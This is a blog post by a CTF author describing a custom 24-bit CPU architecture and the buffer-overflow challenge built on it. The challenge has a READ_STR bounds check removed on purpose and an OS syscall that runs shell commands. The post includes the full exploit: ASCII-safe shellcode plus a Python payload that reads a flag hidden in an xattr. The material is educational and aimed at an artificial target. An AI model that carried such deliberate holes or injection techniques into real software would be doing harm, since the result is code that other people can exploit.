Building a PWN Challenge on My Own CPU (I swear I don't like pain)

So I had this little idea of building an entire custom CPU instruction set architecture called Rune ISA from scratch - 42-bit instructions, 24-bit registers, a full VM in Python, an assembler, and a text-based RPG called Unknown Runes as a reversing challenge for ISSessions CTF 2026. It felt like the ISA needed more, so I uh made something.

If you haven't read the last one yet, what are you doing here?? [go read that first](https://kernelmode0x0.blogspot.com/2026/03/i-made-cpu-for-ctf-challenge-ft-my.html) :P

For the diligent ones who actually read the last one, you'll know I mentioned that after sinking all that time into building an entire ISA, assembler, and VM, it felt like such a waste to make just one challenge and be done with it.

So I expanded the narrative universe lol. Time to build a PWN challenge.

## The Scenario

I wanted the two challenges to be connected through lore, not just through the ISA. In Unknown Runes, one of the characters you can encounter is an old dark mage - a figure of immense power who's treated as this mythical, almost legendary entity in the game world. The mage path flag from Unknown Runes is `{Hack3rs_Ar3_T3chinically_Dark_Mag3s}` - 35 characters between the braces. Remember that number.

For the PWN challenge, I wrote a sequel scenario. Here's what the players would see:

> *He embraced the darkness.*
>
> *There are alawys absurd tales of powerful men shared in haze of strong liquor, but that's all they are, grand tales for entertainment. All but one, the man from Stormhaven. Within a decade he had toppled three kingdoms. Within two, the world had a new name for him.*
>
> *Then, one morning, he was simply gone. No body. No note. No throne.*
>
> *That was your great grandfather, a man who has always fascinated you, you went through all records you could find, even asked your parents but to no avail. The fire of curiousity burning within you demanded more, so you complied and set on a adventure.*
>
> *It took months of digging through every record, journal, & article out there but you finally stumbled upon something, a workshop, hidden deep within the Ashengrave forest, the old man sure knew how to keep people away from his stash.*
>
> *Today, after a week of sifting through various trinkets and research notes you found something tucked behind a false wall, a small arcane device, still humming, still waiting.*
>
> *There's a prompt. There's a question. And somewhere in the old man's machine, a legacy left behind for the right person to find.*
>
> *Answer carefully, for the old man was not known for his generosity.*

So the dark mage from Unknown Runes IS the great grandfather in A Legacy of Darkness. The "arcane device, still humming, still waiting" is the Rune ISA machine. Same universe, same architecture, different challenge. The mage flag being exactly 35 characters becomes the input buffer size in the PWN challenge. A little cross-challenge Easter egg that probably nobody would notice unless they solved both challenges and then really thought about it.

I was quite proud of how the lore tied together, honestly.

## The Data Width Mismatch Comes Back to Byte (heh, still a terrible pun ik)

Now, remember when I said in Part 1 that making the memory layout 64-bit while the data width is 24-bit was going to come back to haunt me? Yeah, this is where it happened and it bit (heh) me in the ass pretty hard.

See, the stack uses 64-bit addresses and stores 64-bit values, but the registers are 24-bit signed. So while a 24-bit signed immediate *can* be sign-extended to reach a stack address (the stack lives at `0xFFFFFFFFFFF00000`, and sign-extending a negative 24-bit value lands up in that range), I couldn't *rely* on that for clean exploit design. The mismatch between data width and address width created all sorts of headaches when I was trying to design the buffer overflow.

Like, I'd be sitting there trying to figure out "okay so the player needs to overwrite this address, but the address is 64-bit and they can only work with 24-bit values, so how do they..." and then I'd stare at the ceiling for a while.

Remember kids: **your data width and address width should not have a mismatch.**

## The Stack Ops That Never Got Their Moment

So here's the full story of my ridiculous irony. When I first started building A Legacy of Darkness, my initial instinct was "okay, classic PWN challenge, buffer overflow on the stack, overwrite the return address, redirect execution." You know, the textbook exploitation path. Every PWN player knows it; it's elegant, it's satisfying, it makes sense.

And I realised the ISA didn't even have stack operations yet. Like, at all. No PUSH, no POP, no CALL, no RET. The entire Unknown Runes RPG was built without them - I was just using JMP for everything and manually managing memory addresses with STOREI/LOADI when I needed to save and restore state. Absolute caveman behaviour.

So I went and built the full suite. PUSH, POP, CALL, RET, and then PUSHI (push an immediate directly), PUSHA (push all three registers at once), and POPA (pop them all back). The PUSHA/POPA pair especially felt like a godsend cause holy shit the amount of times I had to do the "save RA to memory, do thing, reload RA from memory" dance with 3 registers was driving me insane.

I even wrote a quick test for them - `stack_test.asm`, which was literally just this:

```asm
MOV RB, 42
PUSH RB
MZERO RB
POP RB
PRINT_INT RB
HALT
```

Push 42, zero the register, pop it back, print it. If it prints 42, the stack works. Thorough testing methodology right there. Very scientific. Very rigorous. (It was not.)
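To make the semantics concrete, here's a tiny Python model of these stack ops. It's a sketch under assumptions, not the actual Rune VM code: the stack grows downward from the base address `0xFFFFFFFFFFF00000` (quoted in the next section), each slot is 8 bytes, popped values are masked to the 24-bit register width, and `PUSHA`/`POPA` use RA, RB, RC order. `ToyStackVM` and its method names are hypothetical.

```python
MASK24 = (1 << 24) - 1
STACK_BASE = 0xFFFFFFFFFFF00000  # stack base address quoted in this post
SLOT = 8                         # each stack entry is 8 bytes wide


class ToyStackVM:
    """Hypothetical model of PUSH/POP/PUSHA/POPA; not the real Rune VM."""

    def __init__(self) -> None:
        self.regs = {"RA": 0, "RB": 0, "RC": 0}
        self.sp = STACK_BASE
        self.mem: dict[int, int] = {}  # sparse map: 64-bit address -> slot value

    def _push_value(self, value: int) -> None:
        self.sp -= SLOT                # assumption: the stack grows downward
        self.mem[self.sp] = value

    def _pop_value(self) -> int:
        value = self.mem.pop(self.sp)  # a KeyError here means stack underflow
        self.sp += SLOT
        return value

    def push(self, reg: str) -> None:
        self._push_value(self.regs[reg])

    def pop(self, reg: str) -> None:
        self.regs[reg] = self._pop_value() & MASK24  # registers only keep 24 bits

    def pusha(self) -> None:
        for reg in ("RA", "RB", "RC"):
            self.push(reg)

    def popa(self) -> None:
        for reg in ("RC", "RB", "RA"):  # reverse order so each register gets its own value back
            self.pop(reg)


# Replaying stack_test.asm
vm = ToyStackVM()
vm.regs["RB"] = 42    # MOV RB, 42
vm.push("RB")         # PUSH RB
vm.regs["RB"] = 0     # MZERO RB
vm.pop("RB")          # POP RB
print(vm.regs["RB"])  # PRINT_INT RB -> 42
```

The `PUSHA`/`POPA` pair is what makes the "save everything, print, restore everything" pattern a two-instruction affair instead of three pushes and three pops.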

Anyway, so I have my shiny new stack operations and I sit down to design the stack-based exploitation route aaand... I immediately run into the same mismatch problem. The stack lives at `0xFFFFFFFFFFF00000` - a 64-bit address. Each stack entry is 8 bytes wide. But my registers are 24-bit signed, and so is the immediate field. You literally cannot hold a full 64-bit stack address in a register.

Like okay, sure, a negative 24-bit immediate sign-extends to 64 bits, so *technically* certain high addresses are reachable. But I couldn't design a clean exploit path where a player would overwrite a return address on a 64-bit stack using 24-bit register values. The bit widths just don't line up. It'd be the jankiest, most fragile exploit ever, and not in the fun "CTF jank" way, in the "this is genuinely broken and unfair" way.
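The "technically reachable" bit is just two's-complement sign extension. Here's a small Python sketch, assuming the VM widens a 24-bit value by copying bit 23 into the upper 40 bits (the helper names are hypothetical). A negative 24-bit value can only land in the top 8 MiB of the 64-bit space, from `0xFFFFFFFFFF800000` upward. The stack base `0xFFFFFFFFFFF00000` happens to sit inside that window, but no other high address can survive a round trip through a register.

```python
MASK24 = (1 << 24) - 1
MASK64 = (1 << 64) - 1


def sign_extend_24(value: int) -> int:
    """Treat the low 24 bits as two's complement and widen to a 64-bit pattern."""
    value &= MASK24
    if value & (1 << 23):  # sign bit set -> negative
        value -= 1 << 24
    return value & MASK64


def fits_in_24(address: int) -> bool:
    """True if a 64-bit address survives truncation to 24 bits plus sign extension."""
    return sign_extend_24(address) == address


print(hex(sign_extend_24(0x800000)))   # 0xffffffffff800000, lowest reachable high address
print(hex(sign_extend_24(0xF00000)))   # 0xfffffffffff00000, the stack base
print(fits_in_24(0xFFFFFFFFFFF00000))  # True
print(fits_in_24(0xFFFFFFFFFF7FFFF8))  # False, just below the window
```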

So I scrapped the stack exploitation route entirely. All those beautiful stack operations I just built, and the whole reason I built them - gone. Useless for the exploit.

I ended up going with a code segment buffer overflow instead, where the buffer and the overwrite target both live in the 24-bit addressable code/data region. Much cleaner, much more solvable.

But I kept all the stack ops in the ISA, cause like, I'd already built them. And they ended up being incredibly useful when I went back and updated `genJourney.py` for the RPG - the combat system uses `PUSH`/`POP` to save damage values between print calls (cause with 3 registers you literally cannot hold the damage value, the HP address, and the string address at the same time), and `prt_save()` uses `PUSHA`/`POPA` to save all registers before a print and restore them after. So they found a home eventually, just not the one I originally built them for.

## The Two New Syscalls

So stack ops weren't the only thing I added to the ISA for this challenge. I also needed two new syscalls that didn't exist in the original spec.

In Part 1, the ISA had 9 syscalls (IDs 0-8) - enough for printing, reading input, string comparisons, and random numbers. Everything the RPG needed. But for a PWN challenge, I needed players to actually be able to *do* something once they got code execution. What's the point of a buffer overflow if you can't run commands?

So I added two more:

| ID | Name | What it does |
| --- | ---- | -------------------------------------------------------------- |
| 9 | `SYS` | Gives information about the syscall whose ID is in `RB` |
| 10 | `OS` | Executes a shell command on the host system (command string address in `RB`, length in `RC`) |

`SYS` was added as a quality-of-life thing for the players. Since they'd be reversing an unknown architecture with no documentation, having a syscall that literally tells you "here are all the syscalls you can use" felt like a fair hint to include. It's the kind of thing where if someone is poking around and happens to try syscall 9, they get rewarded with useful information. A little nudge in the right direction.
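A sketch of what a `SYS`-style lookup could look like in a Python VM. This is illustrative only: `SYSCALL_INFO` and `sys_describe` are hypothetical names, and the table lists just the syscall IDs that actually show up in this post (0 `EXIT`, 4 `READ_STR`, 9 `SYS`, 10 `OS`). The real table also covers IDs 1-3 and 5-8, which aren't described here.

```python
# Hypothetical descriptions; only the syscall IDs that appear in this post are listed.
SYSCALL_INFO = {
    0: "EXIT: exit with the status code in RB",
    4: "READ_STR: read a line of input into [RB], max length RC",
    9: "SYS: describe the syscall whose ID is in RB",
    10: "OS: run the RC-byte command string at [RB] on the host",
}


def sys_describe(rb: int) -> str:
    """Handler sketch for syscall 9: look up the syscall ID held in RB."""
    return SYSCALL_INFO.get(rb, f"syscall {rb}: no description available")


print(sys_describe(10))
```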

`OS` is... well, `OS` is the entire point. It takes a command string address in `RB` and the string length in `RC`, and just runs it on the host via `subprocess`. Intentionally dangerous, intentionally powerful, and the whole reason the Docker container runs as an unprivileged `ctfuser`. This is what the exploit needs to reach - get code execution, invoke `OS` with a crafted command, and exfiltrate the flag.
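Roughly how an `OS` handler might pull its command out of VM memory and hand it to `subprocess`. This is a minimal sketch, not the actual `util.py` code: it assumes VM memory is a flat `bytearray`, that the command is ASCII, and that it runs through a shell with a timeout. `sys_os` is a hypothetical name, and the privilege drop is left out here.

```python
import subprocess


def sys_os(memory: bytearray, rb: int, rc: int, timeout: float = 5.0) -> str:
    """Syscall 10 sketch: run the rc-byte command string stored at address rb."""
    raw = bytes(memory[rb:rb + rc])  # exactly RC bytes; no null terminator involved
    command = raw.decode("ascii", errors="replace").strip()  # padding spaces are harmless
    result = subprocess.run(
        command,
        shell=True,           # intentionally dangerous: this is the whole point
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return result.stdout + result.stderr


# A 35-byte, space-padded command at address 0, like the buffer in this challenge
mem = bytearray(64)
mem[0:35] = b"echo hello".ljust(35, b" ")
print(sys_os(mem, 0, 35), end="")  # hello
```

Because the length comes from `RC` rather than a terminator, whatever sits in those 35 bytes gets executed, which is exactly what the exploit leans on later.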

The fun part is that these two syscalls only exist in the version of the VM for "A Legacy of Darkness". The Unknown Runes VM doesn't have them at all. So even if someone who solved the first challenge looked at the syscall table they knew about, they'd have no idea syscalls 9 and 10 existed in this one. Another layer of reversing.

## How The Challenge Works

The program itself is actually quite simple once you understand the ISA. Here's what `Legacy.asm` does:

1. Jumps to `main`
2. `main` prints some narrative text - the old dark mage talking to you, being all ominous and whatnot
3. Prints a prompt (`> `)
4. Calls `fn_read` which does something... interesting

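The `fn_read` function is where the real setup happens. Before it reads any input, it does what looks like carving out a massive amount of stack space:

```asm
fn_read:
MZERO RC
MZERO RA
MOV RC, 8492
loop:
PUSHI 0
INC RA
POP RB
JLE RA, RC, loop
```

It loops 8,492 times (8,493 if you're counting exactly, since `JLE` keeps jumping while `RA <= RC`), pushing a zero and immediately popping it back off. Since every push is paired with a pop, the stack never actually gets deeper than one slot, so it's less "stack frame" and more busywork, which is, well, useless for our purposes.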
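A quick Python replay of that loop, tracking the iteration count and the peak stack depth. It's a sketch under assumptions: `JLE` jumps when `RA <= RC`, and `PUSHI`/`POP` each move the stack pointer by exactly one slot. `replay_fn_read_loop` is a made-up name.

```python
def replay_fn_read_loop(limit: int = 8492) -> tuple[int, int]:
    """Replay fn_read's PUSHI/INC/POP/JLE loop; return (iterations, peak stack depth)."""
    ra, rc = 0, limit  # MZERO RA / MOV RC, 8492
    depth = peak = iterations = 0
    while True:
        depth += 1               # PUSHI 0
        peak = max(peak, depth)
        ra += 1                  # INC RA
        depth -= 1               # POP RB
        iterations += 1
        if not ra <= rc:         # JLE RA, RC, loop (fall through once RA > RC)
            break
    return iterations, peak


print(replay_fn_read_loop())  # (8493, 1)
```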

But on another note, 8492 is also the port the server runs on. The keen-eyed among you would have spotted a pattern, and the ones with a decent memory would have a very good guess (or would even recognise it outright if you're an autistic plane nerd lol).

Well, for the rest of you, it's the 8492nd Squadron from Ace Combat 5, the ghost squadron that "doesn't exist". Felt fitting for a challenge about a dark mage the lore treats as mythical. Another Easter egg that absolutely nobody will notice, but it makes me happy.

Then it reads user input into a 35-byte buffer:

```asm
MOV RA, 4 ; READ_STR syscall
MOV RB, buffer ; buffer address
MOV RC, 35 ; max length
SYSCALL RA, RB, RC
```

The buffer sits directly in the code/data segment, and right after it is the `validate` handler:

```asm
buffer:
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0

validate:
MZERO RA
MOVR RB, RA
SYSCALL RA, RB ; EXIT(0)
```

After `fn_read` returns, the program jumps to `validate`, which just exits cleanly. Boring. Safe.

Unless you overflow the buffer.

## The Vulnerability

The vulnerability is that `READ_STR`'s buffer overflow protection is deliberately disabled in this version of the VM. In the normal VM, `READ_STR` writes at most `maxLen` bytes, where `maxLen` is the value in `RC`. In the DarkLegacy version (`util.py`), that check is stripped, so you can write past the 35-byte buffer and straight into the `validate` handler, overwriting its `EXIT` instructions with whatever you want.
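A minimal Python sketch of the difference, using a hypothetical `read_str` helper (the real `util.py` code isn't shown in this post). It assumes memory is a flat `bytearray`, the trailing newline is stripped, and the returned byte count is what ends up in `RA`. The layout mirrors the listing above: 35 bytes of `buffer`, then `validate` (3 instructions of 6 bytes each).

```python
BUFFER_LEN = 35    # the .DB zeros reserved for buffer
VALIDATE_LEN = 18  # validate: 3 instructions x 6 bytes each


def read_str(memory: bytearray, addr: int, max_len: int, line: bytes,
             enforce_limit: bool = True) -> int:
    """Copy one input line into memory at addr; return the byte count (what lands in RA)."""
    data = line.rstrip(b"\n")
    if enforce_limit:
        data = data[:max_len]  # normal VM: never write more than maxLen bytes
    end = addr + len(data)     # DarkLegacy: no clamp, so end can run past the buffer
    if end > len(memory):
        raise IndexError("write past the end of VM memory")
    memory[addr:end] = data
    return len(data)


def fresh_memory() -> bytearray:
    # buffer (zeros) followed by validate; 0xFF bytes stand in for validate's real encoding
    return bytearray(BUFFER_LEN) + bytearray(b"\xff" * VALIDATE_LEN)


payload = b"A" * BUFFER_LEN + b"B" * VALIDATE_LEN + b"\n"

safe = fresh_memory()
read_str(safe, 0, BUFFER_LEN, payload, enforce_limit=True)
print(safe[BUFFER_LEN:] == b"\xff" * VALIDATE_LEN)  # True: validate untouched

vuln = fresh_memory()
read_str(vuln, 0, BUFFER_LEN, payload, enforce_limit=False)
print(vuln[BUFFER_LEN:] == b"B" * VALIDATE_LEN)  # True: validate overwritten
```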

## The UTF-8 Woes

But there's a twist. The server wraps the socket connection in UTF-8 encoding:

```python
r = conn.makefile("r", buffering=1, encoding="utf-8", errors="replace")
w = conn.makefile("w", buffering=1, encoding="utf-8", errors="replace")
```

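This means any shellcode byte ≥ `0x80` gets mangled by Python's UTF-8 decoder. Bytes in that range only mean something as part of a multi-byte UTF-8 sequence: a byte like `0xC0` isn't a valid start byte at all, so with `errors="replace"` Python swaps it for the replacement character `U+FFFD`, and a run of bytes that *does* form a valid sequence gets merged into a single non-ASCII character. Either way your original bytes are gone, and things go very wrong.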

So the exploit shellcode has to be entirely ASCII-safe - all bytes must be < `0x80`.
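The mangling is easy to reproduce in Python. The sketch below shows `0xC0` turning into `U+FFFD`, plus a round-trip check that assumes (hypothetically) the VM re-encodes the decoded string as UTF-8. Valid multi-byte sequences can survive that particular round trip, but since the VM's string-to-bytes step isn't spelled out here, the stricter ASCII-only rule is the safe one. Both helper names are made up.

```python
def survives_text_wrapper(payload: bytes) -> bool:
    """True if the payload is byte-identical after a UTF-8 decode/encode round trip."""
    text = payload.decode("utf-8", errors="replace")
    return text.encode("utf-8") == payload


def is_wire_safe(payload: bytes) -> bool:
    """The rule the shellcode follows: 7-bit ASCII only, and no newline to cut readline() short."""
    return all(b < 0x80 for b in payload) and b"\n" not in payload


print(b"\xc0A".decode("utf-8", errors="replace") == "\ufffdA")  # True: 0xC0 became U+FFFD
print(survives_text_wrapper(b"\x0b\x00\x00\x40\x04\x00"))     # True
print(survives_text_wrapper(b"\xc0\x00\x00\x40\x04\x00"))     # False
```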

I spent quite a while going back and forth trying different instruction combinations to find ones where every byte in the encoding was below 0x80. This was a genuinely fun puzzle to solve cause I had to think about what the encoded bytes would look like, not just what the instructions would do.

## The 3-Instruction Shellcode

After much pain (and a lot of scribbling hex values on paper), I landed on a 3-instruction shellcode that is entirely ASCII-safe, all 18 bytes under 0x80:

```asm
MOV RA, 11 ; encoded: 0B 00 00 40 04 00
DEC RA ; encoded: 00 00 00 40 74 00 (now RA = 10 = OS syscall)
SYSCALL RA, RB, RC ; encoded: 00 00 00 6C 7C 00
```

Let me walk through why this works, cause it's honestly my favourite part of the whole project.

After `fn_read` returns, the register state is: `RA` = number of bytes read (the `SYSCALL` return value), `RB` = buffer address (still set from before the `SYSCALL`), `RC` = 35 (also still set from before the `SYSCALL`).

But wait, the `SYSCALL` return value overwrites `RA`. So we can't rely on `RA` being anything specific. What we CAN rely on is `RB` and `RC` - they still hold the buffer address and the buffer length from when `fn_read` set them up.

So the shellcode does:
1. `MOV RA, 11` - loads 11 into `RA`. Why not 10 directly? Because `MOV RA, 10` encodes as `0A 00 00 40 04 00` and `0x0A` is a newline character (`\n`) which would terminate the `readline()` early. So we load 11 instead.
2. `DEC RA` - decrements `RA` to 10. Now `RA` = 10 = `OS` syscall number.
3. `SYSCALL RA, RB, RC` - invokes the `OS` syscall with `RB` = buffer address and `RC` = buffer length. The `OS` syscall reads a command string from the buffer address, which is... the first 35 bytes of our payload.
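Why 11 instead of 10, in code. Going by the two encodings quoted in this post (`MOV RA, 11` → `0B 00 00 40 04 00` and `MOV RA, 10` → `0A 00 00 40 04 00`), the 24-bit immediate appears to sit little-endian in the first three bytes, with `40 04 00` fixed for `MOV RA`. The sketch assumes exactly that layout; `encode_mov_ra` is a hypothetical helper, not the real assembler.

```python
MOV_RA_TAIL = bytes([0x40, 0x04, 0x00])  # assumed fixed opcode/register bytes for MOV RA, imm


def encode_mov_ra(imm: int) -> bytes:
    """Assumed layout: 24-bit immediate (little-endian) followed by the MOV RA bytes."""
    return (imm & 0xFFFFFF).to_bytes(3, "little") + MOV_RA_TAIL


for imm in (10, 11):
    enc = encode_mov_ra(imm)
    print(imm, enc.hex(" "), "contains a newline!" if b"\n" in enc else "ok")
```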

So the first 35 bytes of the payload ARE the shell command, space-padded. The shellcode instructions start right after them, at offset 35, which is exactly where the `validate` handler lives, so they overwrite it. The command gets read from the payload itself.

The exploit script constructs the payload like this:

```python
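cmd = "getfattr -n user.description ~/.ssh"  # exactly 35 chars; a ~/* glob would skip dotfiles like .ssh
assert len(cmd) <= 35, "the command has to fit in the 35-byte buffer"
cmd_padded = cmd.ljust(35, " ")  # pad to 35 bytes so the shellcode lands exactly on validate
shellcode = bytes([
    0x0B, 0x00, 0x00, 0x40, 0x04, 0x00,  # MOV RA, 11
    0x00, 0x00, 0x00, 0x40, 0x74, 0x00,  # DEC RA  (RA = 10 = OS)
    0x00, 0x00, 0x00, 0x6C, 0x7C, 0x00,  # SYSCALL RA, RB, RC
])
payload = cmd_padded.encode() + shellcode
# Every byte has to survive the UTF-8 text wrapper and must not end readline() early
assert all(b < 0x80 for b in payload) and b"\n" not in payload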
```

I was almost jumping for joy when I verified every single byte was < `0x80`. Null bytes were fine, cause the buffer isn't null-terminated and `READ_STR` reads by length, not up to a null terminator. Other than the `0x80` rule, the only byte I had to watch out for was `0x0A` (newline), which would end the `readline()` early.

I could have made it longer, but the elegance of a 3-instruction shellcode that fits perfectly in the 18 bytes after the buffer (exactly where `validate` lives) was just too good to pass up.

## The Flag: Hidden in xattr

Now, the flag itself is hidden in an extended file attribute (xattr) on a fake SSH key file. This was actually my friend's idea: I was talking to him about the challenge, wondering whether this much suffering would be enough for the players or if I should make it even worse, and, well, he suggested hiding the flag somewhere that wouldn't show up in a normal `ls`, `cat`, or `find`.

So the flag `{0ne_Last_T3st:Little0ne}` is set as a `user.description` xattr on `/home/ctfuser/.ssh` at container runtime via the entrypoint script:

```bash
#!/bin/bash
setfattr -n user.description -v "{0ne_Last_T3st:Little0ne}" /home/ctfuser/.ssh
exec python3 -u server.py
```

Why at runtime and not build time? Because Docker's overlay2 filesystem strips extended attributes during the build process. I spent like an hour confused about why `setfattr` worked in the Dockerfile but the attribute was gone when the container started. Turns out that's just a known quirk of overlay2. Setting it in the entrypoint script at container start works perfectly.

The player needs something like `getfattr -n user.description ~/.ssh` as their command to extract the flag; conveniently, that's exactly 35 characters, while spelling out the full `/home/ctfuser/.ssh` path would blow past the buffer. If they don't know about xattrs, they'd never find it. Which is the point.
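Two details are easy to get wrong here, so here's a quick Python check (a sketch; the temp directory and file names are made up for illustration, and the `~/.ssh` command is an assumed one that fits the 35-byte buffer). Python's `glob` skips dotfiles for a bare `*`, just like the shell, so a `~/*` pattern would never touch `.ssh`. And `os.getxattr` (Linux only) is the Python counterpart of `getfattr -n`.

```python
import glob
import os
import tempfile

CMD = "getfattr -n user.description ~/.ssh"
print(len(CMD))  # 35

with tempfile.TemporaryDirectory() as home:
    open(os.path.join(home, ".ssh"), "w").close()       # stand-in for the flag-bearing file
    open(os.path.join(home, "notes.txt"), "w").close()  # an ordinary, non-hidden file
    star = sorted(os.path.basename(p) for p in glob.glob(os.path.join(home, "*")))
    dot = sorted(os.path.basename(p) for p in glob.glob(os.path.join(home, ".*")))
    print(star)  # ['notes.txt'] - .ssh is skipped
    print(dot)   # ['.ssh']


def read_description(path: str) -> str:
    """Python equivalent of `getfattr -n user.description PATH` (Linux only)."""
    return os.getxattr(path, "user.description").decode()
```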

![solve.py](https://blogger.googleusercontent.com/img/a/AVvXsEhw_Lxlx1eMT4e4RpEVLKyo0IWl3VBPQ257PYGCH_LMUfOqzmyi2UfWwbMaf-aSui4Qdz4eeKAQsiYNWAc-FFhgrJOBHfVgnGy3bPblTB3CLuIn4mQGoQFMN_hfTC5dstqMSaB9w6HVdjJ8pz-GJSn5nr_zBr_0ZYX0Ch29-7SOfPFp8PZKCPB1d-ooEqgJ)
*A little script I made to basically get a persistent shell and test the functionality; it's running on the deployed CTFd Docker instance*

## Server and Docker

The DarkLegacy server runs on port 8492 (the Ace Combat Easter egg I mentioned earlier). The Docker container is Alpine-based (lighter than the Python image used for Unknown Runes) and runs as an unprivileged `ctfuser`:

```dockerfile
RUN adduser -D ctfuser
```

The `OS` syscall in the VM drops to this user before executing commands, so even if someone gets command execution, they can't mess with the server itself or touch anything `ctfuser` doesn't have permissions for. Well, unless they find a privilege escalation, but that's a different CTF challenge entirely :P
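For the "drops to this user" part, here's one way to do it from Python. This is a sketch, not the challenge's actual code: it uses the `user`, `group`, and `extra_groups` parameters of `subprocess.run` (Python 3.9+, POSIX only), passes a minimal environment, and only clears supplementary groups when running as root, since that step needs privileges. `run_as` and its parameters are hypothetical.

```python
import os
import subprocess


def run_as(uid: int, gid: int, home: str, command: str, timeout: float = 5.0) -> str:
    """Run a shell command as uid/gid with a minimal environment; return stdout + stderr."""
    extra = {"extra_groups": []} if os.geteuid() == 0 else {}  # setgroups() needs root
    result = subprocess.run(
        command,
        shell=True,
        capture_output=True,
        text=True,
        timeout=timeout,
        user=uid,
        group=gid,
        cwd=home,
        env={"HOME": home, "PATH": "/usr/local/bin:/usr/bin:/bin"},
        **extra,
    )
    return result.stdout + result.stderr


# Typical use inside the container (assumes the ctfuser account from the Dockerfile):
# import pwd; pw = pwd.getpwnam("ctfuser"); run_as(pw.pw_uid, pw.pw_gid, pw.pw_dir, "id")
```

Setting `HOME` explicitly also matters for the exploit, since `~` in the command expands from it.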

## Closing Thoughts

So A Legacy of Darkness ended up being a completely different kind of suffering than Unknown Runes.

With Unknown Runes, the pain was in the sheer scale - hundreds of lines of assembly, register juggling, encrypted strings, branching narratives. The ISA itself worked fine, I just had to fight against having only 3 registers.

With A Legacy of Darkness, the pain was architectural. The 64-bit/24-bit mismatch I baked into the ISA during design - back when I thought "eh, players will never need to touch the stack directly" - came back to haunt me the moment I tried to make a stack-based exploit. I built an entire suite of stack operations, tested them, got them working perfectly, and then realised I physically could not use them for the exploit because the address widths didn't line up. That was a humbling afternoon.

But honestly? The constraint forced a more creative exploit design. A code segment buffer overflow where your shellcode overwrites the instruction handler and the payload doubles as both the command and the delivery mechanism - that's actually more interesting than a textbook stack overflow. Sometimes limitations make you build better things. Sometimes.

Things I'd do differently:

- **Match the data width and address width.** I cannot stress this enough. The 24-bit registers with 64-bit stack addresses caused real headaches. Preferably go full 24-bit addresses (smaller but consistent). I said this in Part 1 and I'll say it again here cause I really need to learn this lesson.
- **Design the exploit path BEFORE the ISA.** If I'd thought about "how will someone exploit this?" during the ISA design phase instead of after, I would have caught the address width mismatch immediately. Instead I designed the ISA for the reversing challenge and then tried to bolt on PWN capabilities later.
- **Test your challenge on someone.** I built the whole thing, wrote the exploit, verified every byte, deployed it in Docker, and then went "I hope this is solvable." I should have had someone else attempt it first. Challenge author bias is real.

If you want to look at the code, yea you suffer alone for this one: [DarkLegacy](https://github.com/PrajwalNa/CTF26/tree/main/PWN/DarkLegacy)

And if you haven't read Part 1 yet, go check it out: [Part 1: I Made a CPU for a CTF Challenge (and it almost broke me)](https://kernelmode0x0.blogspot.com/2026/03/i-made-cpu-for-ctf-challenge-ft-my.html)

Hope you enjoyed this journey through my descent into madness. Between the two posts, I think I've covered enough suffering to last at least a couple more CTFs. Probably.

P.S. The "alawys" typo in the challenge description has been there long enough that it's officially a feature now.

Prajwal's Blog
